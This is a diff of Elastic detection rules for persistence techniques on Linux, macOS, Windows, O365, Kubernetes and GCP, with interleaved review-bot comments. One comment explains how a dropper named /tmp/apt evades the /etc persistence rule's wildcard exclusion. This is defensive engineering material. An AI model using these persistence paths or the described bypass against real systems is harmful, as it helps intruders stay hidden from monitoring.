@@ -15,6 +15,28 @@ "references": [ "https://ss64.com/osx/dsenableroot.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "cc2fd2d0-ba3a-4939-b87f-2901764ed036", "severity": "medium", @@ -51,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_etc_file_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_etc_file_creation.json new file mode 100644 index 0000000000000..c703d84eb54fa --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_etc_file_creation.json 
@@ -0,0 +1,147 @@ +{ + "author": [ + "Elastic" + ], + "description": "Detects the manual creation of files in specific etc directories, via user root, used by Linux malware to persist and elevate privileges on compromised systems. File creation in these directories should not be entirely common and could indicate a malicious binary or script installing persistence for long term access.", + "from": "now-9m", + "index": [ + "logs-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious File Creation in /etc for Persistence", + "query": "file where event.action == \"creation\" and user.name == \"root\" and file.path : (\"/etc/ld.so.conf.d/*\", \"/etc/cron.d/*\", \"/etc/sudoers.d/*\", \"/etc/rc.d/init.d/*\", \"/etc/systemd/system/*\") and not process.executable : (\"*/dpkg\", \"*/yum\", \"*/apt\", \"*/dnf\", \"*/systemd\")\n", + "references": [ + "https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/", + "https://www.intezer.com/blog/research/lightning-framework-new-linux-threat/" + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 80, + "rule_id": "1c84dd64-7e6c-4bad-ac73-a5014ee37042", + "severity": "medium", + "tags": [ + "Elastic", + "Host", + "Linux", + "Threat Detection", + "Persistence", + "Orbit", + "Lightning Framework" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1037", + "name": "Boot or Logon Initialization Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/", + "subtechnique": [ + { + "id": "T1037.004", + "name": "RC Scripts", + "reference": 
"https://attack.mitre.org/techniques/T1037/004/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.006", + "name": "Dynamic Linker Hijacking", + "reference": "https://attack.mitre.org/techniques/T1574/006/" + } + ] + }, + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.002", + "name": "Systemd Service", + "reference": "https://attack.mitre.org/techniques/T1543/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.003", + "name": "Cron", + "reference": "https://attack.mitre.org/techniques/T1053/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.003", + "name": "Sudo and Sudo Caching", + "reference": "https://attack.mitre.org/techniques/T1548/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_evasion_hidden_launch_agent_deamon_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_evasion_hidden_launch_agent_deamon_creation.json index 12350f2b4b483..fcc91266785a9 100644 
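Review bot: `"risk_score": 80` is paired with `"severity": "medium"`, while every other rule in this diff uses 73/high, 47/medium or 21/low (and the sibling Dynamic Linker rule uses 85/high); one of the two values is wrong and should be aligned, most likely `"severity": "high"`. The `not process.executable : ("*/dpkg", "*/yum", "*/apt", "*/dnf", "*/systemd")` exclusion is a wildcard suffix match, so any dropper named `/tmp/apt` or `/dev/shm/dnf` bypasses the rule entirely; anchoring to absolute paths such as `"/usr/bin/dpkg"` and `"/usr/bin/yum"` removes that trivial evasion. Coverage also leans Red Hat: `/etc/rc.d/init.d/*` is listed but Debian's `/etc/init.d/*` is not, and `systemctl` (which likely creates symlinks under `/etc/systemd/system/*.wants/` on `enable`) does not match `*/systemd`, so expect false positives from routine service enablement by root unless it is excluded.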
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_evasion_hidden_launch_agent_deamon_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_evasion_hidden_launch_agent_deamon_creation.json 
@@ -11,13 +11,26 @@ "language": "eql", "license": "Elastic License v2", "name": "Creation of Hidden Launch Agent or Daemon", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "file where event.type != \"deletion\" and\n file.path : \n (\n \"/System/Library/LaunchAgents/.*.plist\",\n \"/Library/LaunchAgents/.*.plist\",\n \"/Users/*/Library/LaunchAgents/.*.plist\",\n \"/System/Library/LaunchDaemons/.*.plist\",\n \"/Library/LaunchDaemons/.*.plist\"\n )\n", + "note": "", + "query": "file where event.type != \"deletion\" and\n file.path :\n (\n \"/System/Library/LaunchAgents/.*.plist\",\n \"/Library/LaunchAgents/.*.plist\",\n \"/Users/*/Library/LaunchAgents/.*.plist\",\n \"/System/Library/LaunchDaemons/.*.plist\",\n \"/Library/LaunchDaemons/.*.plist\"\n )\n", "references": [ "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "092b068f-84ac-485d-8a55-7dd9e006715f", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -75,5 +88,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_evasion_hidden_local_account_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_evasion_hidden_local_account_creation.json index 68776fcdff429..0c73b9e36d5ad 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_evasion_hidden_local_account_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_evasion_hidden_local_account_creation.json 
@@ -12,14 +12,22 @@ "language": "eql", "license": "Elastic License v2", "name": "Creation of a Hidden Local User Account", - "note": "## Triage and analysis\n\n### Investigating Creation of a Hidden Local User Account\n\nAttackers can create accounts ending with a `$` symbol to make the account hidden to user enumeration utilities and\nbypass detections that identify computer accounts by this pattern to apply filters.\n\nThis rule uses registry events to identify the creation of local hidden accounts.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positive (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Delete the hidden account.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Creation of a Hidden Local User Account\n\nAttackers can create accounts ending with a `$` symbol to make the account hidden to user enumeration utilities and\nbypass detections that identify computer accounts by this pattern to apply filters.\n\nThis rule uses registry events to identify the creation of local hidden accounts.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positive (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Delete the hidden account.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "registry where registry.path : \"HKLM\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\*$\\\\\"\n", "references": [ "https://blog.menasec.net/2019/02/threat-hunting-6-hiding-in-plain-sights_8.html", "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/tree/master/2020/2020.12.15.Lazarus_Campaign" ], + "required_fields": [ + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "2edc8076-291e-41e9-81e4-e3fcbc97ae5e", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -54,5 +62,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_evasion_registry_ifeo_injection.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_evasion_registry_ifeo_injection.json index 3acae337041b3..491b8c0a2ffca 100644 
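Review bot: The query kept as context, `registry where registry.path : "HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\*$\\"`, carries no `event.type` constraint, so deleting a hidden account's key fires the same "Creation of a Hidden Local User Account" alert as creating it, which will confuse the triage steps that now sit in `note`. If Endpoint reports the key creation as a `change` event, `and event.type != "deletion"` is the safe narrowing; if it reports `creation`, pin that instead. Either way the `required_fields` list should then also include `event.type`.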
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_evasion_registry_ifeo_injection.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_evasion_registry_ifeo_injection.json @@ -14,6 +14,18 @@ "references": [ "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/" ], + "required_fields": [ + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 41, "rule_id": "6839c821-011d-43bd-bd5b-acff00257226", "severity": "medium", @@ -50,5 +62,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_evasion_registry_startup_shell_folder_modified.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_evasion_registry_startup_shell_folder_modified.json index 45f74b00c7253..c503b4e4c63df 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_evasion_registry_startup_shell_folder_modified.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_evasion_registry_startup_shell_folder_modified.json 
@@ -12,6 +12,18 @@ "name": "Suspicious Startup Shell Folder Modification", "note": "## Triage and analysis\n\n### Investigating Suspicious Startup Shell Folder Modification\n\nTechniques used within malware and by adversaries often leverage the Windows registry to store malicious programs for\npersistence. Startup shell folders are often targeted as they are not as prevalent as normal Startup folder paths so this\nbehavior may evade existing AV/EDR solutions. These programs may also run with higher privileges which can be ideal for\nan attacker.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related file tied to the Windows Registry entry.\n- Validate the activity is not related to planned patches, updates, network administrator activity or legitimate software\ninstallations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to shell folders. 
This activity could be based\non new software installations, patches, or other network administrator activity. Before entering further investigation,\nit should be verified that this activity is not benign.\n\n### Related rules\n\n- Startup or Run Key Registry Modification - 97fc44d3-8dae-4019-ae83-298c3015600f\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", "query": "registry where\n registry.path : (\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Common Startup\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Common Startup\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Startup\"\n ) and\n registry.data.strings != null and\n /* Normal Startup Folder Paths */\n not registry.data.strings : (\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n 
\"%ProgramData%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"%USERPROFILE%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\"\n )\n", + "required_fields": [ + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "c8b150f0-0164-475b-a75e-74b47800a9ff", "severity": "high", @@ -48,5 +60,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_exchange_suspicious_mailbox_right_delegation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_exchange_suspicious_mailbox_right_delegation.json index 6946dd97761b6..a2905e660879d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_exchange_suspicious_mailbox_right_delegation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_exchange_suspicious_mailbox_right_delegation.json 
@@ -14,10 +14,49 @@ "language": "kuery", "license": "Elastic License v2", "name": "O365 Exchange Suspicious Mailbox Right Delegation", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:o365.audit and event.provider:Exchange and event.action:Add-MailboxPermission and \no365.audit.Parameters.AccessRights:(FullAccess or SendAs or SendOnBehalf) and event.outcome:success and\nnot user.id : \"NT AUTHORITY\\SYSTEM (Microsoft.Exchange.Servicehost)\"\n", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.action:Add-MailboxPermission and\no365.audit.Parameters.AccessRights:(FullAccess or SendAs or SendOnBehalf) and event.outcome:success and\nnot user.id : \"NT AUTHORITY\\SYSTEM (Microsoft.Exchange.Servicehost)\"\n", + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.AccessRights", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "0ce6487d-8069-4888-9ddd-61b52490cebc", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -43,7 +82,7 @@ "subtechnique": [ { "id": "T1098.002", - "name": "Exchange Email Delegate Permissions", + "name": "Additional Email Delegate Permissions", "reference": "https://attack.mitre.org/techniques/T1098/002/" } ] 
@@ -53,5 +92,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_exposed_service_created_with_type_nodeport.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_exposed_service_created_with_type_nodeport.json new file mode 100644 index 0000000000000..1d3bf41aaf352 --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_exposed_service_created_with_type_nodeport.json 
@@ -0,0 +1,70 @@ +{ + "author": [ + "Elastic" + ], + "description": "This rule detects an attempt to create or modify a service as type NodePort. The NodePort service allows a user to externally expose a set of labeled pods to the internet. This creates an open port on every worker node in the cluster that has a pod for that service. When external traffic is received on that open port, it directs it to the specific pod through the service representing it. A malicious user can configure a service as type Nodeport in order to intercept traffic from other pods or nodes, bypassing firewalls and other network security measures configured for load balancers within a cluster. This creates a direct method of communication between the cluster and the outside world, which could be used for more malicious behavior and certainly widens the attack surface of your cluster.", + "false_positives": [ + "Developers may have a legitimate use for NodePorts. For frontend parts of an application you may want to expose a Service onto an external IP address without using cloud specific Loadbalancers. NodePort can be used to expose the Service on each Node's IP at a static port (the NodePort). You'll be able to contact the NodePort Service from outside the cluster, by requesting :. NodePort unlike Loadbalancers, allow the freedom to set up your own load balancing solution, configure environments that aren't fully supported by Kubernetes, or even to expose one or more node's IPs directly." 
+ ], + "index": [ + "logs-kubernetes.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Kubernetes Exposed Service Created With Type NodePort", + "note": "", + "query": "kubernetes.audit.objectRef.resource:\"services\" and kubernetes.audit.verb:(\"create\" or \"update\" or \"patch\") and kubernetes.audit.requestObject.spec.type:\"NodePort\"\n", + "references": [ + "https://kubernetes.io/docs/concepts/services-networking/service/#publishing-services-service-types", + "https://kubernetes.io/docs/concepts/services-networking/service/#type-nodeport", + "https://www.tigera.io/blog/new-vulnerability-exposes-kubernetes-to-man-in-the-middle-attacks-heres-how-to-mitigate/" + ], + "required_fields": [ + { + "ecs": false, + "name": "kubernetes.audit.objectRef.resource", + "type": "unknown" + }, + { + "ecs": false, + "name": "kubernetes.audit.requestObject.spec.type", + "type": "unknown" + }, + { + "ecs": false, + "name": "kubernetes.audit.verb", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "65f9bccd-510b-40df-8263-334f03174fed", + "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Elastic", + "Kubernetes", + "Continuous Monitoring", + "Execution", + "Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1133", + "name": "External Remote Services", + "reference": "https://attack.mitre.org/techniques/T1133/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 2 +} 
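Review bot: The `false_positives` entry in this new file reads `by requesting :.` — the `<NodeIP>:<NodePort>` placeholder appears to have been dropped (most likely stripped as markup on the way in), so the sentence is unreadable; it should read `by requesting <NodeIP>:<NodePort>.`, escaped as the rule's markdown renderer requires. Separately, `tags` lists both `Execution` and `Persistence`, but `threat` maps only to TA0003 Persistence / T1133 External Remote Services; either add the corresponding Execution technique or drop the `Execution` tag so the tag set matches the ATT&CK mapping.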
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_finder_sync_plugin_pluginkit.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_finder_sync_plugin_pluginkit.json index cdef729404ceb..2044b51b84018 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_finder_sync_plugin_pluginkit.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_finder_sync_plugin_pluginkit.json @@ -18,6 +18,33 @@ "references": [ "https://github.com/specterops/presentations/raw/master/Leo%20Pitt/Hey_Im_Still_in_Here_Modern_macOS_Persistence_SO-CON2020.pdf" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "37f638ea-909d-4f94-9248-edd21e4a9906", "severity": "medium", @@ -46,5 +73,5 @@ } ], "type": "eql", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_folder_action_scripts_runtime.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_folder_action_scripts_runtime.json index 5ca2bfe07364a..66d1527d06268 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_folder_action_scripts_runtime.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_folder_action_scripts_runtime.json 
@@ -11,10 +11,42 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via Folder Action Script", - "query": "sequence by host.id with maxspan=5s\n [process where event.type in (\"start\", \"process_started\", \"info\") and process.name == \"com.apple.foundation.UserScriptService\"] by process.pid\n [process where event.type in (\"start\", \"process_started\") and process.name in (\"osascript\", \"python\", \"tcl\", \"node\", \"perl\", \"ruby\", \"php\", \"bash\", \"csh\", \"zsh\", \"sh\")] by process.parent.pid\n", + "query": "sequence by host.id with maxspan=5s\n [process where event.type in (\"start\", \"process_started\", \"info\") and process.name == \"com.apple.foundation.UserScriptService\"] by process.pid\n [process where event.type in (\"start\", \"process_started\") and process.name in (\"osascript\", \"python\", \"tcl\", \"node\", \"perl\", \"ruby\", \"php\", \"bash\", \"csh\", \"zsh\", \"sh\") and\n not process.args : \"/Users/*/Library/Application Support/iTerm2/Scripts/AutoLaunch/*.scpt\"\n ] by process.parent.pid\n", "references": [ "https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.pid", + "type": "long" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], "risk_score": 47, "rule_id": "c292fa52-4115-408a-b897-e14f684b3cb7", "severity": "medium", @@ -59,5 +91,5 @@ } ], "type": "eql", - "version": 5 + "version": 7 } 
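Review bot: The new exclusion `not process.args : "/Users/*/Library/Application Support/iTerm2/Scripts/AutoLaunch/*.scpt"` in the second sequence step removes coverage for any `.scpt` under a per-user, user-writable directory, and that trade-off is not recorded anywhere in the rule. It is a reasonable false-positive fix for iTerm2, but analysts auditing coverage have no way to see the gap from the rule metadata. Consider adding a sentence to `false_positives` or `note`, e.g. `iTerm2 AutoLaunch scripts under ~/Library/Application Support/iTerm2/Scripts/AutoLaunch are excluded from this rule`, so the suppression is documented alongside the query.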
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_gcp_iam_service_account_key_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_gcp_iam_service_account_key_deletion.json index d586982dcf513..da8ab25d3508f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_gcp_iam_service_account_key_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_gcp_iam_service_account_key_deletion.json @@ -13,14 +13,38 @@ "language": "kuery", "license": "Elastic License v2", "name": "GCP IAM Service Account Key Deletion", - "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:google.iam.admin.v*.DeleteServiceAccountKey and event.outcome:success\n", + "note": "", + "query": "event.dataset:gcp.audit and event.action:google.iam.admin.v*.DeleteServiceAccountKey and event.outcome:success\n", "references": [ "https://cloud.google.com/iam/docs/service-accounts", "https://cloud.google.com/iam/docs/creating-managing-service-account-keys" ], + "related_integrations": [ + { + "package": "gcp", + "version": "1.10.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "9890ee61-d061-403d-9bf6-64934c51f638", + "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", 
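Review bot: The narrowed query `event.dataset:gcp.audit` drops the legacy `googlecloud.audit` dataset name, yet the `setup` line added in the same hunk still says "The GCP Fleet integration, Filebeat module, or similarly structured data is required", so deployments still shipping the older dataset name lose this detection silently. If the legacy dataset is intentionally unsupported now, say so in `setup`, e.g. `Events must use the event.dataset value gcp.audit; the legacy googlecloud.audit dataset name is no longer matched.`, so operators can check their pipelines before upgrading. The same dataset narrowing with the same unchanged setup text appears in the next two hunks (GCP Service Account Key Creation and GCP Service Account Creation).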
@@ -49,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_gcp_key_created_for_service_account.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_gcp_key_created_for_service_account.json index 88249ad30adb9..43704fc4e8f45 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_gcp_key_created_for_service_account.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_gcp_key_created_for_service_account.json @@ -13,14 +13,38 @@ "language": "kuery", "license": "Elastic License v2", "name": "GCP Service Account Key Creation", - "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:google.iam.admin.v*.CreateServiceAccountKey and event.outcome:success\n", + "note": "", + "query": "event.dataset:gcp.audit and event.action:google.iam.admin.v*.CreateServiceAccountKey and event.outcome:success\n", 